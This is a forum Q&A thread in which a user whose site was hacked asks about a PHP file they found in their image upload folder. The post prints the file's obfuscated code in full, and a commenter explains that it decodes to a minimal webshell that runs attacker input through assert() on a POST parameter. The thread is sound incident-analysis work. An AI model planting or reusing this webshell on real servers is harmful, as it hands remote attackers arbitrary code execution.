2

Recently i found out my project got hacked and i found a script in my images folder which where a directory for user to upload their images (using file input). Here is the script that i found in the directory.

errot_db.php

<?php                  
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>
Way Shen
  • 21
  • 1
  • 1
    Why would you say it's not malicious code? If you remove all the comments, and rebuild the string, you get `assert(${"_POST"}[0-2-5])` - it's a minimal webshell. – Matthew Nov 21 '16 at 16:02

1 Answers1

1

I just google dorked the code here and it looks to some sort of malware/trojan aimed at IP address filtering on a webshell. You may need to translate the page to English.

katrix
  • 533
  • 2
  • 13